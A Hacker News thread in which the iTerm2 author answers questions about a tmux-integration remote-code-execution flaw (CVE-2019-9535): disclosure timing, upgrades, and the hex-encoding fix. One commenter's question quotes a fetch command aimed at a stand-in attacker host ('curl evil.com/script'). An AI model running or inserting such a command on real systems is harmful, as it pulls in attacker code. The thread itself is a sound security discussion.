9 ms·
iTerm2 author here. I’ll be glad to answer questions.
by gnachman 7y ago
iTerm2 author here. I’ll be glad to answer questions.
- swagonomixxx 7y agoFor folks who don't use the Tmux integration, are they affected at all? I know that the post details that this occurs during usage of the Tmux integration, but is there a possibility that the same vulnerability is present in normal iTerm2 usage (i.e, no Tmux integration)?
- gnachman 7y agoYes, everyone should upgrade. An exploit would use the tmux integration control sequence without your consent.
- ilikepi 7y agoWould you consider a feature request for a setting to disable the tmux integration feature? The exploit seems like good evidence for the need for this. I finally got around to installing iTerm2 this year. It's great, thanks to you (and to all contributors) for all your hard work! I will say, though, that while features like shell integration sound powerful, I personally choose to keep them disabled in order to minimize attack surface. It would be nice to be able to disable tmux integration as well for the same reason, given I don't use tmux. EDIT: clarification
- gnachman 7y agoYep, good idea. There is an advanced pref to disable potentially risky control sequences. I plan to invest in giving users the option to lock things down more so they can trade off convenience vs security as they see fit
- capableweb 7y agoIf you take a look at the demo shown in the blog post, it seems to show that you don't need to run tmux to be vulnerable. The demo video user is just in a normal tab. https://ffp4g1ylyit3jdyti1hqcvtb-wpengine.netdna-ssl.com/security/files/2019/10/cve-2019-9535.webm https://ffp4g1ylyit3jdyti1hqcvtb-wpengine.netdna-ssl.com/sec...
- gervase 7y agoThis is pretty cool, and the first I've heard of the SOS Fund. Was this something that you actively sought out, or did they come to you?
- gnachman 7y agoThey came to me. I’m really thankful that they have chosen to help my project. Security is hard and a fresh set of eyes will spot issues that I’ve become blind to over the years.
- saagarjha 7y agoDoes Build 3.3.7beta1 include the fix?
- gnachman 7y agoYes
- Copenjin 7y agoThe last nightly I see is 3.3.20191004-nightly, does it have the fix? (Thanks for your work, amazing application) Edit: Looking at the parent of that commit, I'd say no.
- gnachman 7y agoNo. The nightly will be fixed tomorrow. I had to wait til this morning for a coordinated disclosure.
- otakucode 7y agoWow. I have never heard of this and not considered it before, but you are right. If you had pushed a fix for the nightly build prior to a fix being available on the main branch, it would have amounted to a disclosure about the stable version to any watching would-be attackers. At least for critical vulnerabilities like these, holding off for a coordinated disclosure like this which raises user notice as much as possible while not tipping your hand does seem like a very smart policy. I follow security stuff pretty regularly (I'm not a user of iTerm2 and read this article and these comments to find out what the exploit would be and what bug led to it, for instance.) but I have never come across a developer doing this intentionally. Is it a well-known security posture thing that I have just missed? In any case, thanks for your contributions with a tool that is obviously so useful to so many. I almost never use macOS, but I do own a 2015 MBP from some development I needed it for in the past. Next time I boot it up, you can be sure I will be installing iTerm2. (I might actually have it and just not remember, but I don't think so, I never invested too much into the platform.)
- mbillie1 7y agoThanks for making iTerm2! I've used it daily for work (and hobby coding) for longer than I can remember now.
- yousifa 7y agoI appreciate how quickly you move to push vulnerability fixes every time.
- nooyurrsdey 7y agoThanks for your hard work on the best piece of software I use daily
- jlokier 7y agoThanks for iTerm2. I've used it every day for years. I'm running 3.0.15 and it reports no updates available. On MacOS 10.9 (upgrading isn't really an option right now, it would break too many things). Is iTerm2 3.0.15 vulnerable? Thanks!
- jlokier 7y agoI'm puzzled by the downvote, as my question seems appropriate to me. Anyone care to provide feedback? Thanks.
- deleted 7y ago[deleted]
- kelnos 7y agoI would guess two things: 1) The linked article says the fix is available in version 3.3.6. If it had been backported to previous release series, the article would say that. 2) You are running an old version of macOS that no longer gets security updates. It's a bit weird to be worried about an unpatched vulnerability in your terminal emulator when you are running an OS that (presumably) has several unpatched vulnerabilities itself. Your focus should be on figuring out how to safely upgrade to a supported version of macOS; after you do that, you'll be able to run the latest iTerm2 and the point is moot.
- ffritz 7y agoDude, you are running a version that came out 6 years ago, while macOS has a yearly release schedule. iTerm would be the least of my concerns. There is just nothing to say here other than go and upgrade it asap.
- klmr 7y agoWhile you’re right, it’s unfortunately not that simple because macOS updates really do break a lot of stuff (especially for developers) and, on older hardware, degrade performance to the point of un-usability. I’ve got an MBP from 2012, and I’ve stopped updating macOS with Sierra (10.12) due to ever degrading performance. I’ll be forced to throw away the (perfectly functional!) laptop at some point once I stop receiving security updates.
- lahwran 7y agoWhat are your thoughts on how to prevent the entire class of vulnerability from being able to happen again?
- gnachman 7y agoBe paranoid about what you send. It’s really clear that any time you output attacker controlled values it can be exploited. I went through several iterations of adding escaping and every one had vulnerabilities. It wasn’t good until the only escaping that remained was very conservative (hex encoded).
- nixpulvis 7y agoI haven't had enough time to truly grasp the changes in the patch, but the use of a prefix, and a well known encoding scheme sounds a bit iffy to me. What's stopping an attacker from looking at the definitions here: https://github.com/gnachman/iTerm2/commit/538d570ea54614d3a2b5724f820953d717fbeb0c#diff-be3d2dc8a7d8a4a81bbba890ab32c9b6R46-R50 https://github.com/gnachman/iTerm2/commit/538d570ea54614d3a2... and using the same `NSUTF8StringEncoding` to build the same attacks? EDIT: Of course GitHub doesn't follow fragment ids when they are part of a large diff, but you can open up `sources/TmuxController.m` yourself.
- gnachman 7y agoNot sure what you mean by NSUTF8StringEncoding. The important fact about encoding is that -encodedString:prefix: limits the output that iTerm2 produces to a very small set of characters from which it's hard to build an exploit.
- vosper 7y agoThanks for all your work on iTerm2! I'm curious about the timing of the MOSS announcement being concurrent with the patch version: what's the rationale for that, versus (eg) waiting until some/more users had upgraded to a fixed version?
- gnachman 7y agoAttackers might discover the change before the rest of the world. This way you are all on even footing.
- cevn 7y agoiTerm is amazing I use it every day. I sent a donation your way for your work.
- ixtli 7y agoI love iTerm2! Thank you for your hard work! I updated a machine i am partially responsible for that was two patch versions behind and at first it only updated to the one previous to this patch. It strikes me that the update check should always go to the most recent version, no? I actually don't know what the normal behavior is here, I was just quite surprised that i had to do the update process twice.
- sieabahlpark 7y agoPlease please I beg you to make a windows version. What would it take to make a windows version of iterm?
- gnachman 7y agoA good deal of money :)
- Southland 7y agoI had 3.3.4. I clicked check for updates, it recommended 3.3.5. After install, I clicked check for updates, it recommended 3.3.6. I installed that one too. Why did it not just suggest 3.3.6 from the start?
- ratling 7y agoI gotta tell you, I full dropped iterm2 due to performance issues several months ago. I'm not sure what changed but it would regularly run my pro fan through the roof, hardware accel on or off. Compared to Terminal (which they put a lot of work into, it's leaps and bounds better than it was a couple years ago) which never seemed to have the issue, has all the features I was using, and I can now make look not-shit enough to be easy on the eyes.
- heelix 7y agoWow, I'm out of date. (Build 3.2.6). Just noticed the 'check for updates', which I guess our overlord IT guys missed in the automation. I had no idea this was not the 'stock' terminal for OSX and doing a bit of reading, this is capable of so much more than the simplistic SSH/vim I've been using it for. Very cool stuff - I'm absolutely blown away by all the functionality that was hidden away behind the prompt.
- warent 7y agoiTerm is made by one person? Wow. Your software has enabled me and many other people to create a ton of value. I'm not sure I would even still be using macOS if iTerm2 wasn't available. Huge thank you for your work. I donated a little bit before but now I really just want to donate more.
- karmelapple 7y agoI setup a monthly contribution - if you do that, too, I think the author will very much appreciate it!
- ____Sash---701_ 7y agoFirstly thanks. Secondly what would be your community goal regarding the python api?
- ji329v089sdjo 7y agoHow does this exploit work? I looked through https://github.com/gnachman/iTerm2/commit/538d570ea54614d3a2b5724f820953d717fbeb0c#diff-be3d2dc8a7d8a4a81bbba890ab32c9b6R46-R50 https://github.com/gnachman/iTerm2/commit/538d570ea54614d3a2... which appears to do some changing of how tmux variables are hanlded/stored. Is the vulnerability that tmux session variable names and other session values are untrusted user input? How does a general command like `curl evil.com/script` turn into an RCE here?
- l2dy 7y agoPlease tag the 3.3.6 release on GitHub. Downstream packagers may rely on it to upgrade.
- DoctorNick 7y agoIs there a way to set up auto-updates outside of the app store?
- drcongo 7y agoI don't have a question, I just want to thank you again for my favourite software.